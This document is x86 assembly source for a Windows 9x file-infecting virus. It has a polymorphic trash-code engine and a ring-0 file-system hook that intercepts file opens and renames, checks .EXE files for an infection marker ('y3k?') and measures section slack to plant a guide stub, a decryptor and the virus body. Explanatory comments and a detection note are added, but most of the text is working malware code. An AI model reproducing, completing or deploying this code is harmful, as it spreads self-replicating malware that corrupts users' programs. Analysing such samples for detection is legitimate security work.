FoundEquals dd 0                ; number of candidates CompareOperands pushed
ReadFromType dd 0               ; table being scanned: 0 registers, 4 memory

;-----------------------------------------------------------------------
; GetEqualValue — choose the source operand to print: the real one
; (FromOperand/FromTypeOfValue) or, at random, another operand whose
; emulated value equals it.  Registers are always searched; the memory
; table only when the destination is a register (no mem,mem forms).
; Candidates sit on the stack as (type, operand) pairs and are dropped
; with `add esp`.
; Out: eax = operand, ebx = type (0 number, 4 register, 8 [number])
; Note: the final DeleteFromInfo passes the source-type encoding
; (4 = register) where GetTable expects a table selector (0 / 4), so it
; does not reach the entry the name suggests; the author's own comment
; below acknowledges the remaining risk.
;-----------------------------------------------------------------------
GetEqualValue:
xor ebx,ebx ; register table

mov [FoundEquals+ebp],ebx
mov [ReadFromType+ebp],ebx

mov ecx,Registers
call CompareOperands

mov ecx,[ToType+ebp]
cmp ecx,4
jae DontTryMemory

mov ecx,MemorySize
mov [ReadFromType+ebp],4
call CompareOperands

DontTryMemory:

push [FromOperand+ebp]          ; the real source is candidate 0
push [FromTypeOfValue+ebp]

mov eax,[FoundEquals+ebp]
inc eax
mov ecx,eax                     ; ecx = number of candidates
call Random


imul eax,eax,8
mov ebx,[esp+eax]               ; type of the chosen candidate
mov eax,[esp+eax+4] ; eax = Operand

imul ecx,ecx,8
add esp,ecx                     ; drop all candidates

test ebx,ebx
jz Return                       ; plain number: nothing to protect

mov ecx,Writeable
call DeleteFromInfo ; delete writeable from mem
; might still create bugs!!!
; will be fixed in the future
; (the odds a bug will happen
; is extremely low)

ret
|
||
|
||
;-----------------------------------------------------------------------
; CompareOperands — scan table ReadFromType, operands ecx..1, and push
; (operand, ReadFromType+4) for every one whose emulated value equals
; FromOperand/FromTypeOfValue, counting in FoundEquals.  Because the
; pushes stay on the stack it returns via ReturnAddress instead of
; `ret` (not reentrant).
; In:  ecx = number of operands in the table
;-----------------------------------------------------------------------
CompareOperands:
pop [ReturnAddress+ebp]
inc ecx
CmpLoop:
dec ecx
jnz Label30
jmp [ReturnAddress+ebp]
Label30:

mov eax,ecx                     ; operand index (1-based)
mov ebx,[ReadFromType+ebp]

call ReadOperand                ; eax = value, ebx = slot holding it

cmp eax,[FromOperand+ebp]
jnz CmpLoop

cmp ebx,[FromTypeOfValue+ebp]
jnz CmpLoop

cmp ecx,[ToOperand+ebp]         ; never offer the destination index (table not checked)
jz CmpLoop

push ecx ; Operand
mov ebx,[ReadFromType+ebp] ; Type
add ebx,4                       ; 0 -> 4 (register), 4 -> 8 ([number])
push ebx
inc [FoundEquals+ebp]
jmp CmpLoop
|
||
|
||
|
||
; UndefineDependentOperands — flag as Undefined every operand (both
; tables) whose emulated value refers to the destination
; (ToOperand/ToType).  Runs only when the destination itself is
; currently Undefined; a defined destination returns at once
; (jnz Return).  Preserves all registers.
UndefineDependentOperands:
call IsOperandUndefined
jnz Return

pushad
xor ebx,ebx
mov ecx,Registers

call Undefine                   ; register table

mov ebx,4
mov ecx,MemorySize
call Undefine                   ; memory table

popad
ret
|
||
|
||
|
||
; Undefine — one table pass for UndefineDependentOperands.
; In:  ebx = table (0 registers, 4 memory), ecx = operand count
; For each operand: read its dominant value slot; if that slot's kind
; (slot - 4: register slot -> 0, [number] slot -> 4) equals ToType and
; the value equals ToOperand, set Undefined on it.  The index equal to
; ToOperand is skipped whatever the table.
Undefine:
inc ecx
mov edx,ebx                     ; edx keeps the table selector across ReadOperand
UndefineLoop:

dec ecx
jz Return

mov eax,ecx
mov ebx,edx
cmp eax,[ToOperand+ebp]
jz UndefineLoop

call ReadOperand                ; eax = value, ebx = slot
sub ebx,4
cmp ebx,[ToType+ebp]
jnz UndefineLoop

cmp eax,[ToOperand+ebp]
jnz UndefineLoop



push ecx
mov eax,ecx
mov ebx,edx
mov ecx,Undefined
call SetInfo
pop ecx
jmp UndefineLoop
|
||
|
||
|
||
; -----------------------------------------------
|
||
; -------------------------- High level functions
|
||
; -----------------------------------------------
|
||
|
||
|
||
|
||
|
||
;-----------------------------------------------------------------------
; RandomOperand — pick a source operand for a trash instruction.
; In:  ebx = ToType (0 register, 4 memory)
; Out: eax = operand, ebx = 0 number / 4 register / 8 [number]
; Random is drawn over 3+EndValueFrecuency values, one fewer when the
; destination is memory, which excludes the GetReadable branch (the
; only one that can return a memory operand) for memory destinations:
;   0                      -> random 32-bit immediate (tail call: Random with eax = 0 returns the raw value)
;   1                      -> random register
;   2..EndValueFrecuency+1 -> the real source operand (EndValue), memory bit stripped
;   EndValueFrecuency+2    -> any readable operand
;-----------------------------------------------------------------------
RandomOperand:
mov eax,3+EndValueFrecuency
shr ebx,2 ; ebx = 0 or 1
sub eax,ebx ; eax = 3 or 2

call Random
xor ebx,ebx

test eax,eax
jz Random ; eax = 1 or 2

dec eax
jz GetReadableReg


sub eax,EndValueFrecuency+1
jz GetReadable

mov eax,[EndValue+ebp]
mov ebx,[EndTypeOfValue+ebp]
and ebx,111b                    ; 12 -> 4, 8 -> 0: never a memory form here
ret
|
||
|
||
|
||
; Operand pickers.  GetReadable returns ebx = 4 for a register
; (eax = 1..Registers) or 8 for a memory cell (eax = 0..MemorySize-1);
; the writeable variants subtract 4 so ebx becomes the table selector
; (0 / 4) that GetTable expects.

; GetWriteableReg — a register carrying the Writeable attribute.
GetWriteableReg:
call GetWriteableLabel1
test ebx,ebx
jnz GetWriteableReg
ret

; Returns a writeable operand
; GetWriteable — a register two times out of three, otherwise any
; writeable operand (falls through into GetWriteableLabel1).
GetWriteable:
mov eax,3 ; create more reg then
call Random ; mem
test eax,eax
jnz GetWriteableReg

GetWriteableLabel1:

call GetReadable
mov ecx,Writeable
sub ebx,4
call TestInfo                   ; ZF set when the attribute is present
jnz GetWriteableLabel1
ret


; GetReadableReg — retry GetReadable until it yields a register.
GetReadableReg:
call GetReadable
cmp ebx,4
jnz GetReadableReg
ret


; Returns an operand
; GetReadable — uniform pick over all registers and memory cells.
GetReadable:
mov ebx,4

mov eax,Registers+MemorySize
call Random
inc eax
cmp eax,Registers+1
jl Return

shl ebx,1                       ; ebx = 8: memory
sub eax,Registers+1
ret
|
||
|
||
|
||
|
||
|
||
|
||
; input
|
||
; eax = register or number
|
||
; ebx = number or register and value or mem
|
||
; ebx = 0 = number
|
||
; ebx = 1 = register
|
||
; ebx = 2 = [number]
|
||
; ebx = 3 = [register]
|
||
|
||
|
||
|
||
; ------------------------------------------
|
||
; ---------------------- Low level functions
|
||
; ------------------------------------------
|
||
|
||
; Random — pseudo-random number.  In: eax = modulus (0 = return the raw
; 32-bit value).  Out: eax in [0, modulus).  State: RandomNumber.
; Preserves ebx, ecx, edx.  The mixing (data-dependent rotate, add,
; xor, rotate back) is ad hoc; nothing here is cryptographic.
Random:
push ebx
push ecx
push edx

mov ebx,eax                     ; modulus

add eax,[RandomNumber+ebp]
mov cl,al
rol eax,cl
add eax,14
xor ecx,46
ror eax,cl
add eax,ecx
xor [RandomNumber+ebp],eax      ; advance the state

test ebx,ebx
jz NoMod

xor edx,edx
div ebx
xchg eax,edx                    ; eax = remainder
NoMod:
pop edx
pop ecx
pop ebx

ret
|
||
|
||
|
||
; input
|
||
; edx = opcode
|
||
|
||
; Output helpers.  Generated text is a sequence of 16-byte-aligned
; entries: a 4-byte opcode stored byte-swapped, then operands written
; as "R<digit>" (register), "N<dword>" (immediate) or "[S<dword>]"
; (memory cell; 'S' marks a slack variable).  TemporaryParseJump builds
; the same layout by hand.

; input
; edx = opcode
; OutputOnlyOpcode — open a new entry at the next 16-byte slot.
OutputOnlyOpcode:
add edi,16
and edi,0fffffff0h
bswap edx
mov [edi],edx
add edi,4
ret

; OutputOpcode — opcode followed by the first operand (eax/ebx).
OutputOpcode:
call OutputOnlyOpcode
jmp OutputNotComma

; Output — ",operand" (second operand).
Output:
mov byte ptr [edi],','
inc edi

; OutputNotComma — write one operand.
; In: eax = number / register index, ebx = kind: 0 number, 1 register,
;     2 [number], 3 [register].  Preserves ecx.
OutputNotComma:
push ecx
xor ecx,ecx
cmp ebx,1
setbe cl
lea ecx,[ecx*8+ecx]             ; ecx = 9 for a non-memory form, else 0
push ecx                        ; kept for the closing bracket and OutputNumber
test ecx,ecx
jnz Label10
mov byte ptr [edi],'['
inc edi

Label10:

test ebx,1
setnz cl

shl ecx,2
add ecx,'N'                     ; 'N' for a number, 'N'+4 = 'R' for a register
mov byte ptr [edi],cl
inc edi
cmp ecx,'N'
jz OutputNumber
add eax,'0'
stosb                           ; register digit
sub eax,'0'
Label11:
pop ecx
test ecx,ecx
jnz Label12

mov byte ptr [edi],']'
inc edi

Label12:
pop ecx

ret

; OutputNumber — the dword value.  For the bracketed form the 'N' just
; written is replaced by 'S'; for the plain form the 'S' lands at edi
; and is immediately overwritten by the stosd.
OutputNumber:
pop ecx
push ecx
test ecx,ecx
setnz cl                        ; cl = 1 (non-memory) -> edi, 0 (memory) -> edi-1

push eax
mov eax,'S'
mov byte ptr [edi+ecx-1],al ; variable
pop eax
stosd

jmp Label11
|
||
|
||
|
||
; Operand tables.  Tables[0] -> register entries, Tables[4] -> memory
; entries; each entry is 20 bytes: the four value slots (see the
; emulation routines) and an attribute dword at +InfoPtr with bits
; such as Writeable and Undefined.

; GetTable — In: eax = operand index (1-based), ebx = table selector
; (0 / 4).  Out: eax -> entry, CF = 0.  ebx = 8 is not a table: CF = 1
; (and ZF = 1 from the compare), eax unchanged.
GetTable:
cmp ebx,8
stc
jz Return

dec eax
imul eax,eax,20 ; TableSize
add eax,[Tables+ebx+ebp]
clc
ret



; SetInfo — or the ecx bits into the operand's attribute dword.  Preserves eax.
SetInfo:
push eax
call GetTable
jc ReturnPopEax
or [eax+InfoPtr],ecx ; Set attribute
pop eax
ret

; DeleteFromInfo — clear the ecx bits (or, then xor).  Preserves eax.
DeleteFromInfo:
push eax
call GetTable
jc ReturnPopEax
or [eax+InfoPtr],ecx ; Set attribute
xor [eax+InfoPtr],ecx ; Clear it
pop eax
ret

; ChangeInfo — overwrite the attribute dword with ecx.  Preserves eax.
ChangeInfo:
push eax
call GetTable
jc ReturnPopEax
mov [eax+InfoPtr],ecx
pop eax
ret


; IsOperandUndefined — ZF = 1 when the operand (eax/ebx) has the
; Undefined attribute or has no table at all (ebx = 8).  Preserves ecx.
IsOperandUndefined:
push ecx
mov ecx,Undefined



call TestInfo
pop ecx
jz Return
jc SetZeroFlag                  ; appears unreachable: GetTable's failure path already leaves ZF set
ret

SetZeroFlag:
cmp eax,eax
ret


; TestInfo — ZF = 1 if any ecx bit is set in the attribute dword
; (note: inverted relative to a plain `test`), ZF = 0 otherwise, CF = 0;
; CF = 1 with ZF = 1 when ebx = 8.  ecx is clobbered (0 or 1).
TestInfo:
push eax
call GetTable

jc ReturnPopEax
test [eax+InfoPtr],ecx
mov ecx,0
setnz cl                        ; cl = 1 if a bit is set
lahf                            ; ah = flags
shl cl,6                        ; move to the ZF bit position
btr ax,6+8                      ; clear ZF in ah
or ah,cl                        ; ZF := bit set
sahf
pop eax
clc
ret
|
||
|
||
|
||
|
||
|
||
; eax = The operand
|
||
; ebx
|
||
; Which table to read from
|
||
|
||
; ReadOperand — read an operand's emulated value.
; In:  eax = operand index, ebx = table (0 / 4)
; Out: if the operand is Undefined: ebx = table + 4, eax unchanged.
;      Otherwise eax = value of the highest nonzero slot and ebx = that
;      slot's offset (12 [register], 8 [number], 4 register; slot 0 is
;      reported when 12/8/4 are all zero).  Preserves ecx.
ReadOperand:
call IsOperandUndefined
jz OperandIsUndefined
call GetTable


push ecx
xor ebx,ebx
mov ecx,16


FindValueLoop:
sub ecx,4
jecxz Label32                   ; down to slot 0

cmp [eax+ecx],ebx
jz FindValueLoop

Label32:
mov ebx,ecx
mov eax,[eax+ecx]
pop ecx
ret

OperandIsUndefined:
add ebx,4
ret


; ReturnPopEax — shared failure exit for the *Info helpers.
ReturnPopEax:
pop eax
ret
|
||
|
||
|
||
; GetWhereFrom / GetWhereTo — return the first entry of the FromWhere /
; EndWhere table that is not -1 (the marker MutateCode fills in).
; Out: eax = entry value, ebx = byte offset of that entry in the table.
; The scan has no upper bound; it relies on a non -1 entry existing.
GetWhereFrom:
lea ebx,[FromWhere+ebp-4]
jmp GodDamnedLabelDammit
GetWhereTo:
lea ebx,[EndWhere+ebp-4]
GodDamnedLabelDammit:
push ebx                        ; table base - 4
xor eax,eax
dec eax                         ; eax = -1
GodDamnedLoopDammit:
add ebx,4
cmp eax,[ebx]
jz GodDamnedLoopDammit
mov eax,[ebx]
sub ebx,[esp]
sub ebx,4
add esp,4
ret
|
||
|
||
; OutputPrefix — if Prefix is nonzero, emit an Op_db entry holding that
; single byte and clear Prefix (it applies to the first instruction
; emitted after ParsePrefix only).  Preserves eax.
OutputPrefix:
push eax

xor eax,eax
cmp eax,[Prefix+ebp]
jz OutputPrefixEnd

add edi,16
and edi,0fffffff0h              ; next 16-byte slot
mov eax,Op_db
bswap eax
stosd
xor eax,eax
inc eax
stosb                           ; length byte = 1
xor eax,eax
xchg eax,[Prefix+ebp]           ; fetch and clear in one step

stosb

OutputPrefixEnd:
pop eax
ret
|
; Optimize — run the "do nothing" pass from esi into edi, then swap
; esi/edi so esi points at the optimised stream (ClearDoNothingInstrucions
; restores edi to the output start before returning).
; ClearUnnessesaryInstructions is disabled (call commented out).
Optimize:
call ClearDoNothingInstrucions
; call ClearUnnessesaryInstructions

xchg esi,edi


ret
|
||
|
||
|
||
MaybeUnnessesaryInstructions:
dd Op_mov, Op_add, Op_sub, Op_and, Op_or, Op_xor
MaybeUnnessesaryInstructionsEnd:

; ClearUnnessesaryInstructions — unfinished dead-store elimination; not
; called (see Optimize).  As written the loop never exits: both paths
; jump back to ClearUnnessesaryInstructionsLoop, so the trailing
; `pop edi / ret` is unreachable, and FindNextEntry does not advance
; edi because its `rep scasb` is commented out.  Kept verbatim.
ClearUnnessesaryInstructions:
push edi

sub esi,16

ClearUnnessesaryInstructionsLoop:
push edi
add esi,16
and esi,0fffffff0h
lodsd
bswap eax

lea edi,[MaybeUnnessesaryInstructions+ebp]
mov ecx,(MaybeUnnessesaryInstructionsEnd-MaybeUnnessesaryInstructions)/4
repnz scasd

test ecx,ecx
jz DontOptimize2

xor eax,eax

; skip the destination operand text up to the ','
.while (al!=',')
lodsb

.endw

mov edi,esi
mov ecx,1000h
FindNextEntry:
; rep scasb
jecxz DontOptimize2

mov ebx,edi
and edi,0fffffff0h
sub ebx,edi
cmp ebx,4
jz DontOptimize2

mov ebx,Op_mov
cmp [edi],ebx
jnz FindNextEntry
pop edi
jmp ClearUnnessesaryInstructionsLoop

DontOptimize2:
pop edi
and esi,0fffffff0h
mov ecx,16
rep movsb
sub esi,16
jmp ClearUnnessesaryInstructionsLoop



pop edi
ret
|
||
|
||
|
||
;-----------------------------------------------------------------------
; ClearDoNothingInstrucions — copy 16-byte entries from esi to edi,
; dropping "mov X,X" (opcode Op_mov whose first two destination bytes
; equal the two bytes after the ',').  A zero opcode dword is an end
; marker: the first one is copied through, a second consecutive one
; stops the pass.  ecx doubles as the "seen a zero" flag because every
; `rep movsb` leaves it at 0.
; In:  esi -> entries, edi -> output.  Out: edi restored to the output
;      start; esi left inside the final zero entry.
;-----------------------------------------------------------------------
ClearDoNothingInstrucions:
push edi
sub esi,16
xor ecx,ecx

OptimizeLoop:

add esi,16
and esi,0fffffff0h
push esi                        ; entry start, for the copy / skip below

lodsd
test eax,eax
jz OptimizeEnd

bswap eax
cmp eax,Op_mov
jnz DontOptimize

xor eax,eax
lodsw                           ; first two bytes of the destination, e.g. "R3"
mov ebx,eax
lodsb                           ; ','
lodsw                           ; first two bytes of the source
cmp ebx,eax
jnz DontOptimize
pop esi                         ; identical -> drop this entry
jmp OptimizeLoop

DontOptimize:
mov ecx,16
pop esi
rep movsb
sub esi,16
jmp OptimizeLoop

OptimizeEnd:
test ecx,ecx
jnz OptimizeDoReallyQuit

mov ecx,16
pop esi
rep movsb                       ; copy the first zero entry through
sub esi,16

inc ecx                         ; remember it
jmp OptimizeLoop


OptimizeDoReallyQuit:
pop eax                         ; discard the pushed esi
pop edi
ret
; 1. Init block
|
||
|
||
; offset 0
|
||
; pushad
|
||
|
||
; 2. Make pointer to mem
|
||
|
||
; 3. Read block
|
||
; Encrypt block
|
||
; Write block
|
||
|
||
; popad
|
||
|
||
; 5. Change mempointer block
|
||
; 6. Compare and jump block
|
; PE header field offsets, relative to the "PE\0\0" signature
; (IMAGE_NT_HEADERS).
PE_Objects equ 6                ; NumberOfSections
PE_NTHdrSize equ 20             ; SizeOfOptionalHeader
PE_Entrypoint equ 40            ; AddressOfEntryPoint (RVA)
PE_ImageBase equ 52             ; ImageBase
PE_ObjectAlign equ 56           ; SectionAlignment
PE_FileAlign equ 60             ; FileAlignment
PE_ImageSize equ 80             ; SizeOfImage

; IMAGE_SECTION_HEADER field offsets (40 bytes per header).
Obj_Name equ 0
Obj_VirtualSize equ 8
Obj_VirtualOffset equ 12        ; VirtualAddress
Obj_PhysicalSize equ 16         ; SizeOfRawData
Obj_PhysicalOffset equ 20       ; PointerToRawData
Obj_Flags equ 36                ; Characteristics
|
||
|
||
|
||
|
||
|
||
|
||
|
||
; Windows 9x VxD service numbers reached through the int 20h thunk
; (device id IFSMgr = 0040h, service in the low word).  R0_AllocMem /
; R0_FreeMem are IFSMgr's heap services; Ring0_FileIO is
; IFSMgr_Ring0_FileIO; InstallFileSystemAPIhook and UniToBCSPath are
; IFSMgr services as well.  Detection note: these ids next to an
; `int 20h` inside a user-mode PE are characteristic of Win9x ring-0
; infectors.
IFSMgr equ 0040h

R0_AllocMem equ 000dh
R0_FreeMem equ 000eh

Ring0_FileIO equ 0032h
InstallFileSystemAPIhook equ 0067h
UniToBCSPath equ 0041h
|
||
|
||
;-----------------------------------------------------------------------
; Resident (ring-0) part.  Everything here is addressed as [var+edi],
; edi being the base of the resident image (loaded at BasePtr in
; FileFunction).  Entry is a jump to FileFunction, the IFS API hook;
; the helper thunks below sit in front of it.
;-----------------------------------------------------------------------
ResidentcodeStart:

jmp FileFunction

; IFSMgr_Ring0_FileIO function codes (passed in eax).
R0_OPENCREATFILE equ 0D500h ; Open/Create a file
R0_READFILE equ 0D600h ; Read a file, no context
R0_WRITEFILE equ 0D601h ; Write to a file, no context
R0_CLOSEFILE equ 0D700h


; IFS hook function numbers the hook reacts to: open, attribute query
; and rename of a file each trigger the infection path in FileFunction.
IFSFN_FILEATTRIB equ 33
IFSFN_OPEN equ 36
IFSFN_RENAME equ 37


IFSFN_READ equ 0 ; read a file
IFSFN_WRITE equ 1 ; write a file



; --- VxD call thunks ---------------------------------------------------
; Callers push the service id (R0_AllocMem, Ring0_FileIO, ...) and
; `call`.  The thunk pops its return address into ReturnAddr, pops the
; service id, rewrites the 8-byte CallService sequence
; (int 20h / dw service / dw IFSMgr) and jumps into it.  The rewrite is
; repeated on every call, presumably because the VMM patches the
; int 20h sequence in place after its first execution.  Keeping the
; return address in a variable makes the thunks non-reentrant.
; CallService and Slack share the same 8 bytes: the dword reads in
; FileFunction land on top of the thunk, which is another reason it is
; rebuilt each time.

; FileIOWrite — write ecx bytes from esi at file offset edx.
FileIOWrite:
mov eax,R0_WRITEFILE
mov ebx,[FileHandle+edi]
pop [ReturnAddr+edi]
push Ring0_FileIO
jmp Label6

; FileIOReadDWordToSlack — read 4 bytes at file offset edx into Slack.
FileIOReadDWordToSlack:
mov ecx,4 ; how many bytes
; FileIOReadToSlack — read ecx bytes at file offset edx into Slack.
FileIOReadToSlack:
lea esi,[Slack+edi] ; where to place data
; FileIORead — read ecx bytes at file offset edx to esi from FileHandle.
FileIORead:
mov eax,R0_READFILE
; FileIOHandle — eax already holds the function code (used for close).
FileIOHandle:
mov ebx,[FileHandle+edi]
; FileIO — all registers set by the caller.
FileIO:
pop [ReturnAddr+edi]
push Ring0_FileIO
jmp Label6
; vxd — generic service call; the caller pushed the service id.
vxd:
pop [ReturnAddr+edi]
Label6:
pop [CallService+edi+2]         ; service id -> the dw after int 20h
mov word ptr [CallService+edi],20cdh            ; int 20h
mov word ptr [CallService+edi+4],0040h          ; IFSMgr device id
jmp CallService

CallService:
Slack:
int 20h
dw 0dh
dw 0040h
jmp [ReturnAddr+edi]
|
||
|
||
|
||
; Resident data.  The names suggest the ZeroRegStart..ZeroRegEnd block
; is cleared on installation; that code is not in this part of the file.
; Comments cite the uses in FileFunction below.
ZeroRegStart:


db 0
FileToInfect db 256 dup (0)     ; "<drive>:" + path from UniToBCSPath; only names ending ".EXE" proceed

TempPtr dd 0                    ; heap buffer used while compiling the guide / decryptor

TotalSize dd 0
OldAPIFunction dd 0             ; previous IFS hook, chained to at CallInOurFunction
GuidePos dd 0                   ; source and size of the "guide" stub written into .text slack
GuideSize dd 0
DecryptorPos dd 0               ; source and size of the decryptor appended to the last section
DecryptorSize dd 0

HeaderSize dd 0                 ; bytes from the PE signature to the end of the section table (rejected above 1000h)

VirusInRing0Mem dd 0            ; virus body (VSize bytes) written right after the decryptor

MemoryTable dd 0
VirtualDataSegment dd 0         ; buffer written into the .data slack; its first dwords are
;                                 program entry point, data-slack VA, decryptor entry, decrypt start

ReturnAddr dd 0                 ; return slots for the thunks (non-reentrant)
ReturnAddr2 dd 0

Flag dd 0                       ; reentrancy guard: set on entry, cleared at FileFunctionEnd

FileHandle dd 0
PEHeadOfs dd 0                  ; e_lfanew
PEHeadStart dd 0                ; heap copy of PE header + section table; its dword at +12 is the
;                                 infection marker 'y3k?' (checked before, written after infection)
ObjTable dd 0

CodeObjectPtr dd 0              ; section headers matched on the first four name bytes ".tex" / ".dat",
DataObjectPtr dd 0              ; and the last section (its Characteristics are set to 0C0000040h)
LastObjectPtr dd 0

SlackInCodeSegment dd 0         ; offset inside the section where the trailing zero space begins
SlackInDataSegment dd 0

OldRVA dd 0                     ; original AddressOfEntryPoint
StackSave dd 0

NewVirusOffset dd 0
JumpTableMoveOffset dd 0

NewGuideOffset dd 0             ; file offsets written to: guide (in .text slack),
NewDecryptorOffset dd 0         ; decryptor (end of last section), data slack
NewDataSegmentOffset dd 0

Unload dd 0                     ; set when the opened path's first directory starts with "UNLO"; then the hook only chains
ZeroRegEnd:
|
||
|
||
; eax = how much free space
|
||
; ebx = where it is located
|
||
; ecx = pointer to segment object table
|
||
; edx = last object pointer
|
||
|
||
|
||
|
||
|
||
;-----------------------------------------------------------------------
; GetSegmentSlack — find the section whose name starts with the four
; bytes in edx (callers pass 'xet.' = ".tex" and 'tad.' = ".dat") and
; measure its trailing zero space.  Headers are scanned from the last
; one backwards.  Returns through ReturnAddr2 (non-reentrant).
; In:  edx = 4 name bytes, edi = resident base
; Out: eax = usable slack bytes (0 when no section matches),
;      ebx = offset of the slack inside the section,
;      ecx -> matching section header, edx -> last section header
;-----------------------------------------------------------------------
GetSegmentSlack:
pop [ReturnAddr2+edi]

mov eax,[PEHeadStart+edi]
lea ebx,[eax+24]                ; optional header start

xor ecx,ecx
mov cx,[eax+PE_NTHdrSize] ; NT hdr size

add ebx,ecx ; ebx -> object table

mov cx,[eax+PE_Objects] ; # objects
imul ecx,ecx,40

add ecx,ebx
push ecx ; push pointer to last object
; + 40
FindCodeSegmentLoop:
sub ecx,8*5                     ; 40 = size of one section header
cmp ecx,ebx
jl DidntFindSegment

cmp dword ptr [ecx],edx ; is code object?
jnz FindCodeSegmentLoop

pop edx ; pop pointer to last object
sub edx,40

mov eax,[ecx+Obj_PhysicalSize] ; size of segment
mov ebx,[ecx+Obj_PhysicalOffset] ; where does segment start

call CalculateFreeSpace
jmp [ReturnAddr2+edi]

DidntFindSegment:
pop eax
xor eax,eax
jmp [ReturnAddr2+edi]
|
||
|
||
|
||
SegmentSize dd 0                ; scratch for CalculateFreeSpace
SegmentOffset dd 0
SegmentBuffer dd 0

;-----------------------------------------------------------------------
; CalculateFreeSpace — read a whole section into a temporary heap
; buffer and count the zero bytes at its end.
; In:  eax = section raw size, ebx = section file offset, edi = base
; Out: eax = trailing zero bytes minus 20 (safety margin),
;      ebx = offset inside the section where that space starts
;      ((size - 12) - eax); ecx, edx preserved.
; On allocation failure it jumps straight to FileFunctionEndAddEsp
; without undoing the two pushes made here.
;-----------------------------------------------------------------------
CalculateFreeSpace:
push ecx
push edx

mov [SegmentSize+edi],eax
mov [SegmentOffset+edi],ebx

push eax
push R0_AllocMem
call vxd
pop ecx
test eax,eax
jz FileFunctionEndAddEsp

mov [SegmentBuffer+edi],eax

mov edx,[SegmentOffset+edi] ; read from
mov esi,eax ; read to
mov ecx,[SegmentSize+edi] ; how much to read
call FileIORead

mov ebx,edi                     ; keep the base in ebx while edi drives scasb

mov edi,[SegmentBuffer+ebx]

add edi,[SegmentSize+ebx]
sub edi,4 ; edi -> end of segment

push edi ; push end of seg

xor eax,eax
xor ecx,ecx
dec ecx                         ; ecx = -1: no length limit

std
repz scasb                      ; scan backwards while bytes are zero
cld
dec eax
sub eax,ecx                     ; eax = bytes scanned (-1 - ecx)

mov edi,ebx                     ; base back in edi

pop ebx ; end of seg
sub ebx,8 ; decrease some


push eax ; push number of slack bytes

mov eax,[SegmentBuffer+edi]
sub ebx,eax                     ; ebx = offset of (end - 8) inside the section
push eax
push R0_FreeMem
call vxd
pop eax

pop eax ; eax = slackbytes in codeseg
sub eax,20 ; some safety
sub ebx,eax ; where slack starts

pop edx
pop ecx
ret
; ----------------------------------------
|
||
; --------------------------- FileFunction
|
||
; ----------------------------------------
|
||
|
||
FileFunction:
|
||
push ebp
|
||
|
||
mov ebp,esp
|
||
push edi
|
||
push esi
|
||
push ebx
|
||
|
||
BasePtr:
|
||
mov edi,66666666h
|
||
|
||
cmp [Unload+edi],1
|
||
jz CallInOurFunction
|
||
|
||
|
||
xor eax,eax
|
||
inc eax
|
||
cmp [Flag+edi],eax
|
||
jz CallInOurFunction
|
||
|
||
mov [Flag+edi],eax
|
||
mov eax,[ebp+12]
|
||
|
||
cmp eax,IFSFN_OPEN
|
||
jz CheckFilename
|
||
|
||
cmp eax,IFSFN_FILEATTRIB
|
||
jz CheckFilename
|
||
|
||
cmp eax,IFSFN_RENAME
|
||
jnz FileFunctionEnd
|
||
|
||
CheckFilename:
|
||
|
||
mov eax,[ebp+16]
|
||
|
||
test eax,eax
|
||
jz FileFunctionEnd
|
||
|
||
cmp eax,0ffh
|
||
jz FileFunctionEnd
|
||
|
||
cmp eax,25
|
||
ja FileFunctionEnd
|
||
|
||
add eax,'a'-1
|
||
add eax,':'*256
|
||
|
||
lea esi,[FileToInfect+edi]
|
||
|
||
mov word ptr [esi],ax
|
||
|
||
add esi,2
|
||
|
||
push 0
|
||
push 250
|
||
mov eax,[ebp+28]
|
||
mov eax,[eax+12]
|
||
add eax,4
|
||
push eax
|
||
push esi
|
||
|
||
push UniToBCSPath
|
||
call vxd
|
||
add esp,16
|
||
|
||
mov byte ptr [esi+eax],0
|
||
|
||
cmp dword ptr [esi+eax-4],'EXE.'
|
||
jne FileFunctionEnd
|
||
|
||
xor ebx,ebx
|
||
cmp dword ptr [esi+1],'OLNU' ; is catalog starting on unlo
|
||
setz bl
|
||
mov [Unload+edi],ebx ; unload virus then
|
||
|
||
|
||
cmp dword ptr [esi],'FNI' ; dont infect files in win*
|
||
jne FileFunctionEnd ; if there is a bug we dont
|
||
; to hurt system critical
|
||
; files
|
||
|
||
|
||
|
||
sub esi,2
|
||
mov bx,2
|
||
mov cx,0
|
||
mov dx,1h
|
||
mov eax,R0_OPENCREATFILE
|
||
call FileIO
|
||
jc FileFunctionEnd
|
||
|
||
|
||
mov [FileHandle+edi],eax
|
||
|
||
xor edx,edx ; where to read in file
|
||
call FileIOReadDWordToSlack
|
||
jc FileFunctionEndCloseFile
|
||
|
||
|
||
cmp word ptr [Slack+edi],'ZM'
|
||
jnz FileFunctionEnd
|
||
|
||
mov edx,3ch ; where to read in file
|
||
call FileIOReadDWordToSlack
|
||
|
||
mov edx,[Slack+edi]
|
||
mov [PEHeadOfs+edi],edx
|
||
|
||
call FileIOReadDWordToSlack
|
||
|
||
cmp word ptr [Slack+edi],'EP'
|
||
jnz FileFunctionEndCloseFile
|
||
|
||
mov edx,[PEHeadOfs+edi]
|
||
add edx,84
|
||
call FileIOReadDWordToSlack
|
||
|
||
mov ecx,[Slack+edi] ; size of exehead, pehead and
|
||
; objtable
|
||
|
||
mov edx,[PEHeadOfs+edi]
|
||
sub ecx,edx ; size of pehead and objtable
|
||
|
||
cmp ecx,1000h
|
||
ja FileFunctionEndCloseFile
|
||
|
||
mov [HeaderSize+edi],ecx
|
||
lea eax,[ecx+20]
|
||
|
||
; allocate mem for PEHeader
|
||
push eax
|
||
push R0_AllocMem
|
||
call vxd
|
||
pop ecx
|
||
test eax,eax
|
||
jz FileFunctionEndCloseFile
|
||
|
||
|
||
mov ecx,[HeaderSize+edi]
|
||
mov edx,[PEHeadOfs+edi]
|
||
mov esi,eax
|
||
mov [PEHeadStart+edi],esi
|
||
call FileIORead
|
||
|
||
mov eax,[PEHeadStart+edi]
|
||
cmp word ptr [eax],'EP'
|
||
jnz FileFunctionEndAddEsp
|
||
|
||
mov ebx,'y3k?' ; already infected
|
||
cmp [eax+12],ebx
|
||
jz FileFunctionEndAddEsp
|
||
|
||
|
||
|
||
mov edx,'xet.'
|
||
call GetSegmentSlack
|
||
|
||
; eax = how much free space
|
||
; ebx = where it is located
|
||
; ecx = pointer to segment object table
|
||
; edx = pointer to last object table
|
||
|
||
|
||
|
||
|
||
cmp eax,[GuideSize+edi]
|
||
jl FileFunctionEndAddEsp
|
||
|
||
mov [CodeObjectPtr+edi],ecx ; save offset of code object
|
||
mov [SlackInCodeSegment+edi],ebx
|
||
|
||
mov edx,'tad.'
|
||
call GetSegmentSlack
|
||
test eax,eax
|
||
jz FileFunctionEndAddEsp
|
||
|
||
|
||
